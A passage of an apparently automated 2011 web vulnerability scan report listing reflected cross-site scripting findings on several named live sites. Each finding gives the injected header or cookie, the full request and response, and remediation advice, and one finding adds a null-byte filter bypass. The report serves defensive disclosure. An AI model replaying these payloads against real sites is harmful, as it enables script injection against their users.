experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=2399d';alert(1)//1fd21ed3d2');
});


</script>
...[SNIP]...

4.688. http://www.experts123.com/questions/ask [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/ask

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b18'%3balert(1)//6e16c45e18f was submitted in the Referer HTTP header. This input was echoed as 95b18';alert(1)//6e16c45e18f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/ask HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=95b18'%3balert(1)//6e16c45e18f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 16:35:53 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cijh1055dy4tss55r0fkks45; path=/; HttpOnly
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:53 GMT
Connection: close
Content-Length: 11928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=95b18';alert(1)//6e16c45e18f');
});


</script>
...[SNIP]...

4.689. http://www.experts123.com/questions/filter/bank [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.experts123.com
Path:   /questions/filter/bank

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a1d'%3balert(1)//1261bf759ea was submitted in the Referer HTTP header. This input was echoed as 93a1d';alert(1)//1261bf759ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /questions/filter/bank HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=93a1d'%3balert(1)//1261bf759ea

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:55 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:54 GMT
Connection: close
Content-Length: 49014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
}
else
feedbackDialog.dialog('open');
});

experts123.SetExternalReferral('http://www.google.com/search?hl=en&q=93a1d';alert(1)//1261bf759ea');
});


</script>
...[SNIP]...

4.690. http://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/404.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60377</script><script>alert(1)</script>5e2b578442b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/404.jsp HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:14:04 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20813


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=60377</script><script>alert(1)</script>5e2b578442b";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

4.691. http://www.supermedia.com/spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3575c"-alert(1)-"7068f2207e8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/img-spportal/supermedia/background/bkg_left_col_top_shadow_top.gif HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389

Response (redirected)

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20791


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=3575c"-alert(1)-"7068f2207e8";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

4.692. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ba07d"-alert(1)-"85da7928a00 was submitted in the Referer HTTP header. This input was echoed as ba07d"-alert(1)-"85da7928a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: %00ba07d"-alert(1)-"85da7928a00
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; mbox=check#true#1296759589|session#1296759528614-838261#1296761389; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:13:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24677


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Advertising : Superpages Small Business Online Advertising</title>



...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="%00ba07d"-alert(1)-"85da7928a00";
s.pageName="";
s.prop1="";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="
...[SNIP]...

4.693. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af436"-alert(1)-"c8d45d1ae80 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750668049-www.superpages.com-11243779-100942; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:08 GMT; Path=/
Set-Cookie: JSESSIONID=70291ECCDC9094D55B86156B11544BBB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:07 GMT
Content-Length: 65808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...

var remote_add = "REMOTE_ADDR=173.193.214.243";
var http_user = "HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10af436"-alert(1)-"c8d45d1ae80";
var datServ = 'http://ugc-int.superpages.com';
var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/";
var imServ = 'http://media.superpages.com/media/photos/';
var lidforpageload = '2118
...[SNIP]...

4.694. http://www.us.hsbc.com/1/2/3 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae894"-alert(1)-"9ef9bbddbcc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Referer: http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:17 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:17 GMT
Vary: User-Agent,Cookie
Content-Length: 5930
Set-Cookie: USIB2G=0000uiCjKm5hpdCoVHLx-JRHofH:14k1jbteq; Path=/
S: hbus-vh502_1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="Content-Type" content="
...[SNIP]...
.getTime()+(365*24*60*60*1000));
       var expires = "; expires="+date.toGMTString();
       document.cookie = "hp_pref"+"="+"r"+expires+"; path=/";


               window.location="http://www.google.com/search?hl=en&q=ae894"-alert(1)-"9ef9bbddbcc"
</script>
...[SNIP]...

4.695. http://bh.contextweb.com/bh/sync/admeld [V cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The value of the V cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59a51'-alert(1)-'a6f6442db was submitted in the V cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bh/sync/admeld?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_btf?t=1296754790274&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fus%2Fsatellite%2Fei%2Fus_%2Fsatellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F65
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; cwbh1=2709%3B03%2F02%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F05%2F2011%3BFOCI1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Set-Cookie: V=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db; Domain=.contextweb.com; Expires=Sun, 29-Jan-2012 18:54:52 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 214
Date: Thu, 03 Feb 2011 18:54:52 GMT

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=gFEcJzqCjXJj59a51'-alert(1)-'a6f6442db&_segment=2%7CgFEcJzqCjXJj59a51'-alert(1)-'a6f6442db%7C"/>
...[SNIP]...

4.696. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 591c4"-alert(1)-"65b65c1c305 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2549

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411591c4"-alert(1)-"65b65c1c305;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.697. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc04b"-alert(1)-"93a36e51360 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; 